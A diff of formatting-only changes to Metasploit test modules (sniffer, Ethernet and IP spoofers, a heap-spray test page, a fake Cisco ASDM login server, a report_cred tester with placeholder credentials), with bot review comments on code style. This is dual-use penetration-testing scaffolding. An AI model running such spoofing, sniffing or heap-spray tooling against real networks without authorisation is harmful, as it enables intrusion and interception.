|
'Sniffer'
|
||||||
[
|
],
|
||||||
'Sniffer'
|
'DefaultAction' => 'Sniffer'
|
||||||
],
|
|
||||||
'DefaultAction' => 'Sniffer'
|
|
||||||
)
|
)
|
||||||
|
|
||||||
deregister_options('RHOST')
|
deregister_options('RHOST')
|
||||||
|
@ -39,16 +35,15 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
p = PacketFu::Packet.parse(pkt)
|
p = PacketFu::Packet.parse(pkt)
|
||||||
next unless p.is_tcp?
|
next unless p.is_tcp?
|
||||||
next if p.payload.empty?
|
next if p.payload.empty?
|
||||||
|
|
||||||
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
|
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
|
||||||
url = $1
|
url = $1
|
||||||
print_status("GET #{url}")
|
print_status("GET #{url}")
|
||||||
break if url =~ /StopCapture/
|
break if url =~ /StopCapture/
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
close_pcap()
|
close_pcap()
|
||||||
print_status("Finished sniffing")
|
print_status("Finished sniffing")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,33 +3,34 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => "Check Test",
|
||||||
|
'Description' => %q{
|
||||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,15 +10,14 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Ethernet Frame Spoofer',
|
'Name' => 'Simple Ethernet Frame Spoofer',
|
||||||
'Description' => 'This module sends spoofed ethernet frames',
|
'Description' => 'This module sends spoofed ethernet frames',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
[ 'Spoofer' ]
|
||||||
[ 'Spoofer' ]
|
],
|
||||||
],
|
'DefaultAction' => 'Spoofer'
|
||||||
'DefaultAction' => 'Spoofer'
|
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,29 +3,26 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Ftp
|
include Msf::Exploit::Remote::Ftp
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
|
'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
|
||||||
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
|
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
|
||||||
'Author' => [ 'Thomas Ring', 'jduck' ],
|
'Author' => [ 'Thomas Ring', 'jduck' ],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
||||||
begin
|
begin
|
||||||
if (not connect_login)
|
if (not connect_login)
|
||||||
return
|
return
|
||||||
|
@ -34,24 +31,24 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
curdir = ""
|
curdir = ""
|
||||||
|
|
||||||
# change to the upload directory
|
# change to the upload directory
|
||||||
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true )
|
result = send_cmd(["CWD", datastore['UPLOADDIR']], true)
|
||||||
print_status("CWD response: #{result.inspect}")
|
print_status("CWD response: #{result.inspect}")
|
||||||
|
|
||||||
# find out what the server thinks this dir is
|
# find out what the server thinks this dir is
|
||||||
result = send_cmd( ["PWD"], true )
|
result = send_cmd(["PWD"], true)
|
||||||
print_status("PWD response: #{result.inspect}")
|
print_status("PWD response: #{result.inspect}")
|
||||||
if (result =~ /257\s\"(.+)\"/)
|
if (result =~ /257\s\"(.+)\"/)
|
||||||
curdir = $1
|
curdir = $1
|
||||||
end
|
end
|
||||||
curdir = "/" + curdir if curdir[0] != "/"
|
curdir = "/" + curdir if curdir[0] != "/"
|
||||||
curdir << "/" if curdir[-1,1] != "/"
|
curdir << "/" if curdir[-1, 1] != "/"
|
||||||
|
|
||||||
# generate some data to upload
|
# generate some data to upload
|
||||||
data = Rex::Text.rand_text_alphanumeric(1024)
|
data = Rex::Text.rand_text_alphanumeric(1024)
|
||||||
#print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
# print_status("data:\n" + Rex::Text.to_hex_dump(data))
|
||||||
|
|
||||||
# test putting data
|
# test putting data
|
||||||
result = send_cmd_data(["PUT", curdir+"test"], data, "I")
|
result = send_cmd_data(["PUT", curdir + "test"], data, "I")
|
||||||
print_status("PUT response: #{result.inspect}")
|
print_status("PUT response: #{result.inspect}")
|
||||||
|
|
||||||
# test fallthrough
|
# test fallthrough
|
||||||
|
@ -63,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
print_status("LS response: #{result.inspect}")
|
print_status("LS response: #{result.inspect}")
|
||||||
|
|
||||||
# test getting file
|
# test getting file
|
||||||
result = send_cmd_data(["GET", curdir+"test"], "A")
|
result = send_cmd_data(["GET", curdir + "test"], "A")
|
||||||
print_status("GET response: #{result[0].inspect}")
|
print_status("GET response: #{result[0].inspect}")
|
||||||
|
|
||||||
# see if it matches
|
# see if it matches
|
||||||
|
@ -74,13 +71,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
# adios
|
# adios
|
||||||
result = send_cmd( ["QUIT"], true )
|
result = send_cmd(["QUIT"], true)
|
||||||
print_status("QUIT response: #{result.inspect}")
|
print_status("QUIT response: #{result.inspect}")
|
||||||
|
|
||||||
ensure
|
ensure
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,35 +3,35 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Heaplib2 Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
|
'Name' => "Heaplib2 Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' =>
|
'License' => MSF_LICENSE,
|
||||||
[
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'References' => [
|
||||||
[ 'URL', 'https://metasploit.com' ]
|
[ 'URL', 'https://metasploit.com' ]
|
||||||
],
|
],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[ 'Automatic', {} ]
|
[ 'Automatic', {} ]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2014-03-01',
|
'DisclosureDate' => '2014-03-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
spray = %Q|
|
spray = %Q|
|
||||||
function log(msg) {
|
function log(msg) {
|
||||||
|
@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
|
|
||||||
|
|
||||||
print_status("Sending html")
|
print_status("Sending html")
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
|
|
@ -3,46 +3,46 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer
|
include Msf::Exploit::Remote::HttpServer
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Basic HttpServer Simulator',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This is example of a basic HttpServer simulator, good for PR scenarios when a module
|
'Name' => 'Basic HttpServer Simulator',
|
||||||
is made, but the author no longer has access to the test box, no pcap or screenshot -
|
'Description' => %q{
|
||||||
Basically no way to prove the functionality.
|
This is example of a basic HttpServer simulator, good for PR scenarios when a module
|
||||||
|
is made, but the author no longer has access to the test box, no pcap or screenshot -
|
||||||
|
Basically no way to prove the functionality.
|
||||||
|
|
||||||
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
|
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
|
||||||
cisco_asa_asdm.rb module can do a live test against it.
|
cisco_asa_asdm.rb module can do a live test against it.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
|
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' => {
|
||||||
{
|
|
||||||
'SRVPORT' => 443,
|
'SRVPORT' => 443,
|
||||||
'SSL' => true,
|
'SSL' => true,
|
||||||
'URIPATH' => '/'
|
'URIPATH' => '/'
|
||||||
},
|
},
|
||||||
'Author' => [ 'sinn3r' ],
|
'Author' => [ 'sinn3r' ],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
|
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
|
||||||
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
|
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
|
|
||||||
deregister_options('RHOST')
|
deregister_options('RHOST')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns a response when the client is trying to check the connection
|
# Returns a response when the client is trying to check the connection
|
||||||
#
|
#
|
||||||
|
@ -50,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
send_response(cli, '')
|
send_response(cli, '')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns a response when the client is trying to authenticate
|
# Returns a response when the client is trying to authenticate
|
||||||
#
|
#
|
||||||
|
@ -59,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
when 'GET'
|
when 'GET'
|
||||||
# This must be the is_app_asdm? method asking
|
# This must be the is_app_asdm? method asking
|
||||||
print_status("Responding to the is_app_asdm? method")
|
print_status("Responding to the is_app_asdm? method")
|
||||||
send_response(cli, '', {'Set-Cookie'=>'webvpn'})
|
send_response(cli, '', { 'Set-Cookie' => 'webvpn' })
|
||||||
|
|
||||||
when 'POST'
|
when 'POST'
|
||||||
# This must be the do_login method. But before it can login, it must meet
|
# This must be the do_login method. But before it can login, it must meet
|
||||||
|
@ -97,22 +96,20 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, req)
|
def on_request_uri(cli, req)
|
||||||
print_status("Received request: #{req.uri}")
|
print_status("Received request: #{req.uri}")
|
||||||
|
|
||||||
case req.uri
|
case req.uri
|
||||||
when '/'
|
when '/'
|
||||||
res_check_conn(cli, req)
|
res_check_conn(cli, req)
|
||||||
when /\+webvpn\+\/index\.html/
|
when /\+webvpn\+\/index\.html/
|
||||||
res_login(cli, req)
|
res_login(cli, req)
|
||||||
end
|
end
|
||||||
|
|
||||||
# Request not processed, send a 404
|
# Request not processed, send a 404
|
||||||
send_not_found(cli)
|
send_not_found(cli)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
exploit
|
exploit
|
||||||
end
|
end
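Review bot: In `on_request_uri`, `send_not_found(cli)` sits after the `case` instead of in an `else` branch, so it also runs for requests that `res_check_conn` or `res_login` have already answered, which contradicts the comment "Request not processed, send a 404". Moving it into the dispatch as `else` followed by `send_not_found(cli)`, before the `end` that closes the `case`, keeps one response per request. The route pattern `/\+webvpn\+\/index\.html/` is also unanchored and matches anywhere in the URI, which is probably fine for a simulator but deserves a short comment.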
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Capture
|
include Msf::Exploit::Capture
|
||||||
|
@ -12,10 +10,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple IP Spoofing Tester',
|
'Name' => 'Simple IP Spoofing Tester',
|
||||||
'Description' => 'Simple IP Spoofing Tester',
|
'Description' => 'Simple IP Spoofing Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
@ -25,8 +23,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
@@havepcap = false
|
@@havepcap = false
|
||||||
end
|
end
|
||||||
|
|
||||||
deregister_options('FILTER','PCAPFILE')
|
deregister_options('FILTER', 'PCAPFILE')
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
@ -37,9 +34,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
p.ip_ttl = 255
|
p.ip_ttl = 255
|
||||||
p.udp_sport = 53
|
p.udp_sport = 53
|
||||||
p.udp_dport = 53
|
p.udp_dport = 53
|
||||||
p.payload = "HELLO WORLD"
|
p.payload = "HELLO WORLD"
|
||||||
p.recalc
|
p.recalc
|
||||||
ret = send(ip,p)
|
ret = send(ip, p)
|
||||||
if ret == :done
|
if ret == :done
|
||||||
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
|
print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
|
||||||
else
|
else
|
||||||
|
@ -48,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
close_pcap
|
close_pcap
|
||||||
end
|
end
|
||||||
|
|
||||||
def send(ip,pkt)
|
def send(ip, pkt)
|
||||||
begin
|
begin
|
||||||
capture_sendto(pkt, ip)
|
capture_sendto(pkt, ip)
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
|
@ -57,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
return :done
|
return :done
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
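Review bot: `def send(ip, pkt)` gives the module its own two-argument `send`, which replaces `Object#send` on every instance. Any caller that dispatches dynamically with `mod.send(:name)` would then raise ArgumentError or end up in `capture_sendto`. Only `run_host` calls it in the visible lines, so a distinct name such as `def send_packet(ip, pkt)` with `ret = send_packet(ip, p)` avoids the clash; otherwise callers have to fall back to `__send__`. The part of the method between `rescue RuntimeError => e` and `return :done` is outside the hunks, so the error path was not reviewed.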
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Recon Module Tester',
|
'Name' => 'Simple Recon Module Tester',
|
||||||
'Description' => 'Simple Recon Module Tester',
|
'Description' => 'Simple Recon Module Tester',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
['Continuous Port Sweep']
|
||||||
['Continuous Port Sweep']
|
],
|
||||||
],
|
'PassiveActions' => [
|
||||||
'PassiveActions' =>
|
'Continuous Port Sweep'
|
||||||
[
|
]
|
||||||
'Continuous Port Sweep'
|
|
||||||
]
|
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RHOST,
|
Opt::RHOST,
|
||||||
Opt::RPORT,
|
Opt::RPORT,
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@ -54,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
disconnect
|
disconnect
|
||||||
report_host(:host => datastore['RHOST'])
|
report_host(:host => datastore['RHOST'])
|
||||||
report_service(
|
report_service(
|
||||||
:host => datastore['RHOST'],
|
:host => datastore['RHOST'],
|
||||||
:port => datastore['RPORT'],
|
:port => datastore['RPORT'],
|
||||||
:proto => 'tcp'
|
:proto => 'tcp'
|
||||||
)
|
)
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
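Review bot: `rescue ::Exception => e` after the `report_service` call also catches `Interrupt` and `SystemExit`, so a Ctrl-C or a framework shutdown during `run` lands in this handler instead of stopping the module. `rescue ::StandardError => e` is the narrower form unless catching everything is intended. The handler body and the rest of `run` are outside the hunk, so whether it re-raises cannot be seen here. The same clause appears in the `run` loop of the report_cred test module, where the visible handler prints the backtrace, increments `counter_bad` and carries on with the next `test_` method.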
|
||||||
|
|
|
@ -3,24 +3,26 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
FAKE_IP = '192.168.12.123'
|
FAKE_IP = '192.168.12.123'
|
||||||
FAKE_PORT = 80
|
FAKE_PORT = 80
|
||||||
FAKE_USER = 'user'
|
FAKE_USER = 'user'
|
||||||
FAKE_PASS = 'password'
|
FAKE_PASS = 'password'
|
||||||
FAKE_PROOF = 'proof'
|
FAKE_PROOF = 'proof'
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "report_cred Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module will test every auxiliary module's report_cred method
|
'Name' => "report_cred Test",
|
||||||
},
|
'Description' => %q{
|
||||||
'Author' => [ 'sinn3r' ],
|
This module will test every auxiliary module's report_cred method
|
||||||
'License' => MSF_LICENSE
|
},
|
||||||
))
|
'Author' => [ 'sinn3r' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_novell_mdm_creds
|
def test_novell_mdm_creds
|
||||||
|
@ -135,7 +137,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_dlink_dsl320b_password_extractor
|
def test_dlink_dsl320b_password_extractor
|
||||||
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
|
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_nexpose_xxe_file_read
|
def test_nexpose_xxe_file_read
|
||||||
|
@ -165,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_vnc
|
def test_vnc
|
||||||
mod = framework.auxiliary.create('server/capture/vnc')
|
mod = framework.auxiliary.create('server/capture/vnc')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_smtp
|
def test_smtp
|
||||||
|
@ -175,12 +177,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_sip
|
def test_sip
|
||||||
mod = framework.auxiliary.create('server/capture/sip')
|
mod = framework.auxiliary.create('server/capture/sip')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_oracle_login
|
def test_oracle_login
|
||||||
mod = framework.auxiliary.create('admin/oracle/oracle_login')
|
mod = framework.auxiliary.create('admin/oracle/oracle_login')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_postgresql
|
def test_postgresql
|
||||||
|
@ -190,12 +192,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_pop3
|
def test_pop3
|
||||||
mod = framework.auxiliary.create('server/capture/pop3')
|
mod = framework.auxiliary.create('server/capture/pop3')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_http_basic
|
def test_http_basic
|
||||||
mod = framework.auxiliary.create('server/capture/http_basic')
|
mod = framework.auxiliary.create('server/capture/http_basic')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_ftp
|
def test_ftp
|
||||||
|
@ -245,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_msf_rpc_login
|
def test_msf_rpc_login
|
||||||
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
|
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF )
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_mongodb_login
|
def test_mongodb_login
|
||||||
|
@ -285,7 +287,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_sevone_enum
|
def test_sevone_enum
|
||||||
mod = framework.auxiliary.create('scanner/http/sevone_enum')
|
mod = framework.auxiliary.create('scanner/http/sevone_enum')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sentry_cdu_enum
|
def test_sentry_cdu_enum
|
||||||
|
@ -305,7 +307,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_rfcode_reader_enum
|
def test_rfcode_reader_enum
|
||||||
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
|
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_radware_appdictor_enum
|
def test_radware_appdictor_enum
|
||||||
|
@ -376,7 +378,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def test_vbulletin_vote_sqli_exec
|
def test_vbulletin_vote_sqli_exec
|
||||||
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
|
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sap_mgmt_con_brute_login
|
def test_sap_mgmt_con_brute_login
|
||||||
|
@ -450,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_d20pass
|
def test_d20pass
|
||||||
mod = framework.auxiliary.create('gather/d20pass')
|
mod = framework.auxiliary.create('gather/d20pass')
|
||||||
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
|
